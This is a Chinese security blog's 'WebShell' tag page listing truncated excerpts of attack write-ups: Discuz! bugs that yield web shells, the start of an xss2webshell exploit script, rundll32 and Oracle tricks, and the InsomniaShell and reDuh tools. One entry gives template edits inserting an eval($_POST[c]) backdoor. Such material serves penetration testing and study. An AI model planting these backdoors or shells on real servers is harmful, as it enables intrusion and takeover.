标签 ‘WebShell’ 下的日志

Discuz! admin\database.inc.php get-webshell bug

author: ring04h
team:http://www.80vul.com

[该漏洞由ring04h发现并且投递,thx]
由于Discuz!的admin\database.inc.php里action=importzip解压zip文件时,导致可以得到webshell.

一 分析

在文件admin\database.inc.php里代码:

…..
elseif($operation == ‘importzip’) {
阅读全文 »

Tags: , , ,

Discuz! 6.1 xss2webshell[SODB-2008-10] Exploit

/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10]  Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
//目标url
var siteurl=’http://www.80vul.com/Discuz_6.1.0/’;
阅读全文 »

Tags: , , , ,

艰难的在webshell中执行程序

作者:云舒

摘要:一个web shell,系统权限设置得很好,常用的exe都无权执行。可写目录传上去的exe文件,也没有执行权限。最终发现设置权限的时候漏掉了rundll32.exe,如是就写了这个个代码。

测试开始的时候,PHP似乎没权执行命令。本来打算用php本身的一些溢出问题,溢出一个低权限的shell来的。后来意外发现使用proc_open函 数可以执行一些内部命令,只是外部命令和目录都做了比较严格的权限设置而已。于是就测试可能可以利用的外部命令,最终测试到了rundll32.exe程 序,终于没有返回权限不足。写一个dll,给rundll32调用,就可以间接的执行自己上传的任意exe文件了。也许是windows权限的一点小问 题?毕竟使用rundll32间接执行的exe,身份还是php shell的guest权限,虽然调用者变了——真正原因有待进一步研究。
阅读全文 »

Tags: ,

ORACLE 建立数据文件WriteWebShell

作者: kj021320

转载请注明出处

其实 类似ORACLE 这样强大的数据库,真没必要用到这么土的办法

SQLJ   存储过程写文件也可以,逼于无奈对方机器不支持SQLJ  还有  UTL_FILE包也被干掉了?

那 也可以 使用以下我说的这个方式
阅读全文 »

Tags: ,

InsomniaShell

InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either a reverse shell or a bind shell.

It has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation. InsomniaShell.zip

Tags:

reDuh: Re-inventing TCP like its 1973!

reDuh was released as part of SensePost’s BlackHat USA 2008 talk on tunnelling data in and out of networks. Most external firewalls block all incoming sockets except for port 80/443. reDuh allows an attacker to use the compromised web server as a tunneling proxy into the internal network enviroment. reDuh encodes data into valid HTTP requests, which is then delivered to the server agent, decoded, and redirects the data to the various configured tunnels. reDuh is available in JSP/PHP/ASP.

主页:reDuh home page
下载地址:
reDuhClient (the local proxy) | reDuhu Server Pages (JSP/PHP/ASP)

Way7T 那里看到的,原文题目为:超强的内网渗透跳板webshell。

Tags: ,

webshell中上传asp文件调用服务器ActiveX控件溢出获取shell

Team: http://www.ph4nt0m.org
Author: 云舒(http://www.icylife.net)
Date: 2008-02-19

做windows系统渗透测试的时候有webshell了,但是拿不到shell,用来提升权限,也是个很郁闷的事情。一般来说,使用mdb jet引擎的溢出比较常见,但是有时候根据服务器上安装的第三方软件,使用一些新的方法,或许能有一点转机。这里主要描述一下调用activex溢出服务器的思路,方法很简单。

activex溢出一般都是用来攻击客户端的,但是这里,主要就是利用了asp是在服务端执行的,而且可以调用activex控件的原理。废话不多说了,一小段测试性质的代码,在服务器上放这么个asp文 阅读全文 »

Tags: ,

Discuz! 6 后台拿Shell的方法

文章作者:Ryat (lib3r3t)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发狼族(www.wolvez.org),后由原创作者有请提交到邪恶八进制,转载请注明原始作者和出处。

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:
阅读全文 »

Tags: ,